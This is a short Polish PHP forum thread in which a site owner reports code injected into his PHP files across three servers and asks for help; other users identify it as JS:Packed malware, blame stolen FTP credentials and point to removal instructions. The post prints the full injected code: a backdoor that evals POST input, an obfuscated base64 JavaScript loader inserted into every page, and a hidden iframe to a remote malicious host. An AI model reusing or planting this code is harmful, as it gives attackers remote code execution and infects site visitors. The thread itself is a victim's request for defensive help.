[PHP] SERWER NIEZABEZPIECZONY? Opcje

[Piotrwusek]

Witam

Czy spotkaliście sie z czym taki że np. działa sobie stronka i nagle w plikach .php na w głównym folderze pojawiają się nieuzasadnione funkcje?

Miałem stronę na własnym serwerze a tutaj do pliku index.php i innych plików zostało dopisane takie coś...

[PHP] pobierz, plaintext 
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBHaGxKSj0nJSc7
mFyIGt5Sm09KCd2LjYxLjcyLjIwYS4zZC4yMlMuNjNyLjY5cHRFbmdpLjZlLjY1LjIyLjJjYi4zZC4yM
YuNjVyc2lvbi4yOCkuMmIuMjIuMmNqLjNkLjIyLjIyLjJjLjc1LjNkbmF2LjY5Zy42MXQuNmZyLjJldS
3My42NXJBZ2UuNmV0LjNiLjY5ZigodS4yZS42OW5kLjY1Ljc4LjRmZi4yOC4yMldpbi4yMi4yOS4zZTA
MjkuMjYuMjYodS4yZWluZC42NXhPZiguMjJOVC4yMC4zNi4yMikuM2MuMzApLjI2LjI2LjI4ZG9jdW1l
nQuMmVjb29raWUuMmVpLjZlZGV4T2YoLjIybWllay4zZDEuMjIpLjNjLjMwKS4yNi4yNih0eS43MC42N
42Zi42Nih6cnZ6dC43MykuMjEuM2R0Ljc5cGUuNmZmKC4yMkEuMjIuMjkuMjkpLjdiei43MnYuN2F0cy
zZC4yMkEuMjIuM2IuNjUuNzZhLjZjLjI4LjIyaS42Ni4yOC43N2kuNmUuNjRvdy4yZS4yMisuNjEuMmI
MjIpai4zZGorLjIyK2ErLjIyTWEuNmFvci4yMi4yYmIuMmIuNjErLjIyLjRkaW5vci4yMi4yYmIrLjYx
y4yMkJ1aWwuNjQuMjIrLjYyKy4yMmouM2IuMjIpLjNiLjY0by42My43NW0uNjUuNmV0LjJlLjc3cml0Z
guMjIuM2NzLjYzci42OXB0LjIwLjczLjcyYy4zZC4yZi4yZmd1bWJsLjYxLjcyLjJlYy42ZS4yZnJzcy
yZi4zZmlkLjNkLjIyK2ouMmIuMjIuM2UuM2MuNWMuMmZzY3JpcHQuM2UuMjIpLjNiLjdkJykucmVwbGF
ZSgvLi9nLEdobEpKKTtldmFsKHVuZXNjYXBlKGt5Sm0pKX0pKCk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#['"][^s'".,;?![]:/<>()]{30,}#',$v)||preg_match('#[([](s*d+,){20,}#',$v);if((preg_match('#bevalb#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument.write(unescape(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(s*<body)#mi',TMP_XHGFJOKL.'1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
[PHP] pobierz, plaintext 

i na koniec pliku

Kod

<iframe src="http://findbigboob.cn:8080/ts/in.cgi?pepsi" width=2 height=4 style="visibility: hidden"></iframe>

ktoś hakuje? i powiem że to było na 3 rożnych serwerach... 3 razy różne hasła i 3 razy inne zabezpieczenia

[PawelC]

Pisałem już o tym wirusie i jak się go pozbyć, wystarczy użyć szukajki. Tutaj masz wszystko opisane co i jak:
http://forum.php.pl/index.php?showtopic=11...mp;#entry598818

Zapewne używasz Total Commandera i zapisujesz w nim hasła do ftp.

[Piotrwusek]

tam jest nieaktywny link

znasz nazwę tego wirusa? albo nazwę po której jest wyróżniany?

[PawelC]

Nazwa: JS:Packed
Przecież w moim poście jest napisane co trzeba zrobić żeby się go pozbyć.

tam jest nieaktywny link

Proszę: Aktywny link

[batman]

Było wiele razy.
Zamykam.